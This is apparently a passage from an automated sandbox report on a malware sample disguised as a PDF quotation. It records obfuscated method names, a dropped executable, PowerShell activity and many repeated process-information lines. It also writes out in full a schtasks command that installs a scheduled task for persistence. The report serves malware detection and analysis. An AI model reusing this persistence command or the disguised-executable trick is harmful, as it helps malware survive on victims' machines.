Source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, DlRvq5yJkomY4LIf3S.cs	High entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
Source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, vH9V9oD7tIKkmfHnnj.cs	High entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
Source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, DlRvq5yJkomY4LIf3S.cs	High entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
Source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, vH9V9oD7tIKkmfHnnj.cs	High entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
Source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs	High entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
Source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, vH9V9oD7tIKkmfHnnj.cs	High entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

File created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
